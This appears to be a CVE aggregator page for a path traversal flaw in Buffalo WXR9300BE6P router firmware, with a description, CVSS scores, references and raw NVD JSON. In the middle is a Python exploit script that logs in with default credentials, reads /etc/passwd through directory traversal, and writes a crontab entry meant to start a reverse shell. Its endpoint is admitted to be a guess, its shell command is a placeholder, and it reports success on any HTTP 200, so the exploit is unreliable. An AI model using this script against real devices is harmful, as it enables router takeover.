CVE-2025-61941

Description

A path traversal issue exists in WXR9300BE6P series firmware versions prior to Ver.1.10. Arbitrary file may be altered by an administrative user who logs in to the affected product. Moreover, arbitrary OS command may be executed via some file alteration.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Buffalo WXR9300BE6P系列固件 < Ver.1.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-61941 - Buffalo WXR9300BE6P Path Traversal PoC
# This PoC demonstrates the path traversal vulnerability in the router's file management interface
# Note: Requires valid administrator credentials

import requests
from urllib.parse import quote

TARGET_HOST = "http://192.168.11.1"  # Default Buffalo router management IP
ADMIN_USER = "admin"
ADMIN_PASS = "password"

# Step 1: Authenticate to the router management interface
session = requests.Session()
login_url = f"{TARGET_HOST}/cgi-bin/cgi.cgi"
login_data = {
    "username": ADMIN_USER,
    "password": ADMIN_PASS,
    "login": "Login"
}

response = session.post(login_url, data=login_data)
if "Logout" not in response.text:
    print("[-] Authentication failed")
    exit(1)
print("[*] Authenticated successfully")

# Step 2: Exploit path traversal to read arbitrary file
# Craft malicious path with directory traversal sequences
malicious_path = "../../../../../../etc/passwd"
encoded_path = quote(malicious_path)

# File operation endpoint (example - actual endpoint may vary)
file_url = f"{TARGET_HOST}/cgi-bin/cgi.cgi?req=fw&fpath={encoded_path}"
response = session.get(file_url)

if response.status_code == 200:
    print(f"[*] File content retrieved:\n{response.text}")
else:
    print(f"[-] Exploit failed with status code: {response.status_code}")

# Step 3: Write arbitrary file via path traversal
# Modify a system file to achieve command execution
target_file = "../../../../../../tmp/crontab"
command_payload = "* * * * * /bin/sh -c 'reverse_shell'\n"

write_url = f"{TARGET_HOST}/cgi-bin/cgi.cgi?req=fw&fpath={quote(target_file)}"
response = session.post(write_url, data={"content": command_payload})

if response.status_code == 200:
    print("[*] Arbitrary file written successfully - RCE achieved")
else:
    print("[-] File write failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61941
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61941
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61941/
[4] VulDB https://vuldb.com/cve/CVE-2025-61941
[5] https://jvn.jp/en/vu/JVNVU96471278/
[6] https://www.buffalo.jp/news/detail/20251014-01.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61941", "sourceIdentifier": "[email protected]", "published": "2025-10-15T08:15:38.827", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path traversal issue exists in WXR9300BE6P series firmware versions prior to Ver.1.10. Arbitrary file may be altered by an administrative user who logs in to the affected product. Moreover, arbitrary OS command may be executed via some file alteration."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://jvn.jp/en/vu/JVNVU96471278/", "source": "[email protected]"}, {"url": "https://www.buffalo.jp/news/detail/20251014-01.html", "source": "[email protected]"}]}}